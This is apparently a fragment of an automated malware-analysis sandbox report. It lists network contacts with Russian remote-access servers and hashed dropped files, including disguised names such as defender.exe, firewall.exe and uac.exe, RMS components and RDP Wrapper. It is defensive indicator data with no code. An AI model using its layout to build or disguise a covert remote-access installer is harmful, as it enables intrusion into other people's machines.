| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
C:\Users\Admin\AppData\Local\Temp\RMS\setup.bat
| MD5 | 29e13072fa219a53afa88d84ffc17903 |
| SHA1 | e0d2a5ea26982260471588775dceb3a60b3a2d01 |
| SHA256 | d9ca40913b5a976f4b7e07ed83adc217c94730f60ab7e9307d8a5ba4d287387b |
| SHA512 | 314449c87df12cfc4d770ff72f5816eadc5336503104480ec0482aa1918be1730a3d3a580dd1c17669c55d473de4e5df6d035ef8e32e0f8326eac8bf58f0b120 |
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
| MD5 | 432ffc627865aa735aace14cd8a59b30 |
| SHA1 | fe3b916cedbdc4b0293c49378659cc2c4e68be7d |
| SHA256 | 01ac35a35fa0fa9eee05dfe8e12a7625e81904c69d853bdf999c4e95538e6b27 |
| SHA512 | e4fd5a0b08aa2321d06d578012ac1b0e7e53b06920ae75d6d8d5091fc10b3cdcd2c468eda3cfd0092107d0c9af042894f2f1b8e32255e6a11954a1e65e860f78 |
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
| MD5 | 8708699d2c73bed30a0a08d80f96d6d7 |
| SHA1 | 684cb9d317146553e8c5269c8afb1539565f4f78 |
| SHA256 | a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f |
| SHA512 | 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264 |
C:\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
C:\ProgramData\RDP\run.bat
| MD5 | 4e6a1033e3c2f39db397d392fe0d7c77 |
| SHA1 | 11526234cd216334902d51665529c2b9be7acc05 |
| SHA256 | 2eb8001ce06e7b2764fb7b4e637d53583e365640e72a3d53e1d3b4790ae306d4 |
| SHA512 | 395293d8ecd67f4c32702b11fdf0761f9e283346274ee1e4c4a3f47672fc683be4917fd87da2fde4e3d7e986e3884799329f9f28082e89f75aa17ca38c46dceb |
C:\Users\Admin\AppData\Local\Temp\RMS\regedit.reg
| MD5 | aae4fbd269f5d65a222f2db994b1c6e3 |
| SHA1 | cb4dafc589459b6eb1e69dd17e1718e8ac0b3f72 |
| SHA256 | e8ba276486dd6a256dbc0865c74521e8d3e26c735806c695c5c386f82663441c |
| SHA512 | e5660a4c8df0faf0db2dda9c09d18b606a97f4687ad9d4fe03fac39cf608adac21529fffa2f595a701ecde88d43d10390cdfbea2e9e6b9d7931e47f8254d0b71 |
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
| MD5 | 84149257a74fae3b2922fb79e181fee2 |
| SHA1 | f0cbb804568971a8b990f01f8d07297c05fc44c0 |
| SHA256 | 4212603874d5211ba80331e24fd223a1788523d6a454b9aef3df8edc0a7d31bf |
| SHA512 | be90490ba50717b3b0a0f4bceee71c773add208b58d72d088cd6da59607fe7a8d4f3ccc676b14c3bd4aa8e056fa1cb9dff81f004a6789d9c2a1be6f6c655696c |
C:\Users\Admin\AppData\Local\Temp\9207.tmp\9208.bat
| MD5 | 41bd62ba30ba68ec4e214aafabf25804 |
| SHA1 | fd45aed5758f99872e130e60635f2acef76645e8 |
| SHA256 | e4a4aae0922f7dd92cf300fb6add8f3141101ac281d88de8514deb14af2c0af0 |
| SHA512 | 0b382d7ed4a40cfea9d5097c1ce41960323732c1892293f6c85263030493e0b01add165373ec8a83d11fd4562027552b69a4eea6d2f5791278d8f390ff37f63e |
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
| MD5 | b7d30e5c315855dde61bf985ef00ebe4 |
| SHA1 | 28c5edcd97e0e7338bc794174b3bfa3e4cbf5867 |
| SHA256 | f995083a06ac84ba368846278b44d5f91cde0b7f09f4adbabd91fcdffa395165 |
| SHA512 | 7519654a477a55ea282b5a0f384d9bbf6ea11c525260954c9fea6b188bf10c371a9266da3d95cb1d363921c6a207db4a45ba9242d7a1570b2cc3c3523fa1bc90 |
C:\Users\Admin\AppData\Local\Temp\98FC.tmp\98FD.bat
| MD5 | 973b0c9d6042bbdd0d78547bcc6bf036 |
| SHA1 | 2c352764d8410f19fc14f1a95db17e744ee55723 |
| SHA256 | 187bacda7879e31e4f29a027392a4e4fea81bfc2f86abd48c3079ff969c82797 |
| SHA512 | 8e5ee11a935e902b4d282a3057229535615571e2360e7e73b513fff7dfee34a9e30b1858b9e0d9790bf8e15f92607a46e9a81a1bba6122f4976aa0a77ec8b2b4 |
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
| MD5 | b8a928d6df0741b9a2ee7b678a27f817 |
| SHA1 | c61fc60feb264be97628b4bad0633c31da987076 |
| SHA256 | 73e0dc6d8451996737727f9167a8e2a6924461c3d076d6f5506946393be9e3dc |
| SHA512 | afe353f3845675f31843e5e2ecf7d81586e52ea3b6d91107b4e2e703c34d8f28222fdb007f31893b3c833f532053ee30d50e8e10665734a5706029f7eba67c24 |
C:\Users\Admin\AppData\Local\Temp\9AD1.tmp\9AD2.bat
| MD5 | cc5b5df2834515d622d1c0a1bd4eadd2 |
| SHA1 | b1835556b419f667ac72c0de1383c470ad0469ea |
| SHA256 | 29dad257f98000f3603a882d1999e4934ec8e36907fd8222efff827be9d81fc8 |
| SHA512 | eb635c1f2f1d93215e64721da726da9034c580db74b0c0d2e085ef13e2e4562517a82087a6dcd6a06a5570bf3f19e5b0dc24ad1a32160fcb0e652f9a9ee6b121 |
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
| MD5 | 4954a72ec5e52b469bf63aa3dcff8b16 |
| SHA1 | 6cc0554e335d60b6953b75e814e161c63a409907 |
| SHA256 | b964f4411acc021b33d0c10cbb565ad1cdee329973a27636566c11f4a5adf31f |
| SHA512 | bde89d6063d73b3393753541c384d77316134b7a2718307c7d1b4221e1724d378aeedfb7c4141616b13934a35514aa7a92a11ccd93da2fc49f0db96f22d97b46 |
C:\Users\Admin\AppData\Local\Temp\10FB.tmp\10FC.bat
| MD5 | 902125bcd29f2c1e3ed47513b07d952a |
| SHA1 | d47f45491e758c68e602bf74f8b2c95e1f955800 |
| SHA256 | 176905e7abb1f5a0ff31aef142dcc5ec85905784a8b7c33f28cef970d3c673c3 |
| SHA512 | 7a1a77adfd457d07568e05af3b46d50bdc0dc79dc15533b702c8733930aff0e961acd2c2179c6742feab686515fa64dd915095e25564a47ea6ab6c47a813ff00 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\ProgramData\RDP\RDPWInst.exe
| MD5 | 9c257b1d15817a818a675749f0429130 |
| SHA1 | 234d14da613c1420ea17de60ab8c3621d1599f6f |
| SHA256 | b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c |
| SHA512 | b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521 |
C:\Users\Admin\AppData\Local\Temp\RMS\vp8decoder.dll
| MD5 | 0a98acb6e3389b806970d6b8afe849c3 |
| SHA1 | b9265779510c0f444ca58f6f6b3286d0f0439b77 |
| SHA256 | 733f5b78a50ffe54ab315efed57d3821be0b65e3f5db9c62607c904fb5efbf3f |
| SHA512 | 33b6d5b567536c32ad1553e664c357b301f89f2c60a3c0d37e7d73a295404706c80fce66d6d124a4b4293e13253267fcfeca482e387a5acb5ab04e57c5a54177 |
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
C:\Users\Admin\AppData\Local\Temp\RMS\vp8encoder.dll
| MD5 | 33425d50b3f3837bd129dbd22f60de00 |
| SHA1 | 81c8e05b1283d7e993aec25c7341e48678047249 |
| SHA256 | 521d85e9116c6a660a463340c1d5f91d1c50f7ef5f18081e58f6d57b33a56756 |
| SHA512 | 496cf0734dbbeacaa74b64fe5e8e1ed628bde736dba5ab91097bdc237ad95183cb3252503203f17810cd927cfa978d1794af7479163f794bb27f822aa3af4c58 |
memory/4716-171-0x0000000000C60000-0x0000000000C61000-memory.dmp
memory/2220-172-0x0000000000FB0000-0x0000000000FB1000-memory.dmp
memory/216-173-0x0000000002860000-0x0000000002861000-memory.dmp
\??\c:\program files\rdp wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
C:\Program Files\RDP Wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
\??\c:\program files\rdp wrapper\rdpwrap.ini
| MD5 | dddd741ab677bdac8dcd4fa0dda05da2 |
| SHA1 | 69d328c70046029a1866fd440c3e4a63563200f9 |
| SHA256 | 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668 |
| SHA512 | 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec |
C:\Users\Admin\AppData\Local\Temp\RMS\remsetup.bat
| MD5 | 085edd6244d42ba399475686e9b71ea7 |
| SHA1 | 77068b9f3bd7fad105ae1e4f57a5c463e194deb3 |
| SHA256 | f910663b3b2f6d48473d91c716b139583bf292a0dfe592b10b0dc9795e0f77f9 |
| SHA512 | 877313fb1c30e6a0a372d602c5fbd02ed9c86b658a46a282bb912d8d642aa1e3ce2d0febc6d2b119e7ff37f0b8ce0e97267315d9ccab7eba4f8a797e345d519c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0270780F846F08BEFE0DD8112D932FEF
| MD5 | f441cd2e8380efed53a96cd5eb29feba |
| SHA1 | 4dcec4a89e32441789a45417c698a9ed48935d21 |
| SHA256 | 97889237ab2ec0c77e48520bdb9d6a9ab97ccf0dcc575c5f43ba04abdf03eef7 |
| SHA512 | a9ff62495a45ddc6daaf0c1d14a5996fde8d2387b3297cb6b888bda24f15194ba515727de36d420d97790a3c7ee4f017501495cb08044278629edb320184fc23 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0270780F846F08BEFE0DD8112D932FEF
| MD5 | 5d4099f3e5e6f20d1f07a5a49b9093c5 |
| SHA1 | ab073ccc76d0175d4790d75ccc82e35c054ad9cc |
| SHA256 | 324af72c7d8b7743b23a1632d9ffb3dca05c227f7152805c1b7669561378eafc |
| SHA512 | 29f6798995b5e18f5cca70e098096a463fee2805091843585d1913de6b8be785ff7479b0107d2b0bcc5961aec2e5af86c6bfd78493601dfc289db0ccc5746d1d |